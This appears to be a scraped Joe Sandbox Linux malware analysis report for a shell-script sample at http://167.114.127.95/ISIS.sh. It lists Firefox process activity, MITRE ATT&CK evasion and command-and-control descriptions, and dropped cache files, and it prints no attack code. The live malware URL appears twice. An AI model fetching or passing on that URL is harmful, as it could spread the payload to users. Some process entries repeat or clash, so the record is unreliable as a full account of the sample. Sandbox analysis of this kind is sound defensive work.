Start time (UTC):	07:04:08
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4797, Parent PID: 4755

General

Start time (UTC):	07:04:09
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: lsb_release PID: 4797, Parent PID: 4755

General

Start time (UTC):	07:04:09
Start date (UTC):	25/12/2024
Path:	/usr/bin/lsb_release
Arguments:	/usr/bin/python3 -Es /usr/bin/lsb_release -idrc
File size:	3638 bytes
MD5 hash:	18cba7de7bfedd0d9f027bd1c54cc2b2

Chronological Activities

Analysis Process: firefox PID: 4817, Parent PID: 4755

General

Start time (UTC):	07:04:09
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: dbus-launch PID: 4817, Parent PID: 4755

General

Start time (UTC):	07:04:09
Start date (UTC):	25/12/2024
Path:	/usr/bin/dbus-launch
Arguments:	dbus-launch --autolaunch=11ced2f07072c6ae389b731c5cc84014 --binary-syntax --close-stderr
File size:	26616 bytes
MD5 hash:	e4a469f27d130d783c21ce9c1c4456c3

Chronological Activities

Analysis Process: firefox PID: 4884, Parent PID: 4755

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4885, Parent PID: 4884

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4884, Parent PID: 4755

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 1 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4973, Parent PID: 4755

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4974, Parent PID: 4973

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 4973, Parent PID: 4755

General

Start time (UTC):	07:04:10
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 6115 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 5011, Parent PID: 4755

General

Start time (UTC):	07:04:12
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 5012, Parent PID: 5011

General

Start time (UTC):	07:04:12
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	-
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Chronological Activities

Analysis Process: firefox PID: 5011, Parent PID: 4755

General

Start time (UTC):	07:04:12
Start date (UTC):	25/12/2024
Path:	/usr/lib/firefox/firefox
Arguments:	/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 6934 -prefMapSize 172334 -parentBuildID 20190410113011 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appdir /usr/lib/firefox/browser 4755 true tab
File size:	219456 bytes
MD5 hash:	9a5584c0c2c9ac6b1ba6296513075910

Description:	Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report http://167.114.127.95/ISIS.sh

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Process Tree

Yara Signatures

Dropped Files

Suricata Signatures

Joe Sandbox Signatures

Networking

System Summary

Persistence and Installation Behavior

Malware Analysis System Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/home/james/.cache/dconf/user

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/4098689E1EA45FF0094F1C8088E49251FFFF7585

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/88501EF5595DDA9CF633105C8280693B0F4E93C5

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/A05BB352A31B3AC5C9EA2D90ADC35B35A2AAE4BB

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/C389DE279BF5275924497D5B33D1F1900116E591

/home/james/.cache/mozilla/firefox/5zxot757.default/cache2/entries/DEC154D3398A604E855E9460291AFC7DD2F49D3F

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/allow-flashallow-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/allow-flashallow-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/base-track-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/base-track-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flash-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flash-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flashsubdoc-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/block-flashsubdoc-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flash-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flash-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashallow-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashallow-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashsubdoc-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/except-flashsubdoc-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozplugin-block-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozplugin-block-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozstd-trackwhite-digest256.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/mozstd-trackwhite-digest256.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple-1.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-block-simple.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple-1.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple.pset

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-harmful-simple.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-malware-simple-1.sbstore

/home/james/.cache/mozilla/firefox/5zxot757.default/safebrowsing-updating/test-malware-simple.pset

Linux Analysis Report
http://167.114.127.95/ISIS.sh